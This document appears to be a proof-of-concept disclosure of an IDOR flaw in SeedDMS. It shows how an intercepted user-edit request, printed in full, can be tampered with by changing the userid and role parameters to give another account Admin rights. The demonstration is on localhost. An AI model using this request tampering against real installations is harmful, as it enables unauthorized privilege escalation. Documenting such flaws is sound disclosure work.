A simple IDOR allows changing role of a different user by changing userid parameter and role parameter.

• Create two users namely sunil and aman on the endpoint: http://localhost/seeddms/out/out.UsrMgr.php

  

  

• Check list of users at http://localhost/seeddms/out/out.UserList.php

  

• In our case, userid of aman is 5 and userid of sunil is 6. (This can be checked by hovering over or clicking the edit button (the userid appears in the url)

• Go to the endpoint http://localhost/seeddms/out/out.UsrMgr.php?userid=5

and edit the Role to Guest. (Change the userid parameter in the url as per your userid parameters)

• Capture the request in BurpSuite as you click on the Save Button.

  You will get a request like this:

  POST /seeddms/op/op.UsrMgr.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data; boundary=---------------------------113135331919090313053417803191
  Content-Length: 1743
  Origin: <http://localhost>
  Connection: close
  Referer: <http://localhost/seeddms/out/out.UsrMgr.php?userid=5>
  Cookie: mydms_session=143fc0cdf34a682256baae37abda8ce2
  Upgrade-Insecure-Requests: 1
  
  -----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="formtoken"
  
  519192f812db211d797f140b67255d03
  **-----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="userid"
  
  5**
  -----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="action"
  
  edituser
  -----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="login"
  
  aman
  -----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="pwd"
  
  -----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="pwdconf"
  
  -----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="pwdexpiration"
  
  -----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="name"
  
  Aman User
  -----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="email"
  
  [email protected]
  -----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="comment"
  
  **-----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="role"
  
  2**
  -----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="homefolder"
  
  -----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="targetname13e65f6ab355d3a32705b2e99987d414"
  
  -----------------------------113135331919090313053417803191
  Content-Disposition: form-data; name="quota"
  
  0
  -----------------------------113135331919090313053417803191--
  

• Change the userid from 5 to 6 and role from 2 to 1. This changes user from Aman to Sunil and the assigned role from Guest to Admin.

• Now forward the request, and switch off the proxy.

  You'll get an output like this in the web browser:

  

• This shows that instead of Aman (userid=5), the details of Sunil (userid=6) has been updated and the role of sunil assigned is Admin instead of Guest.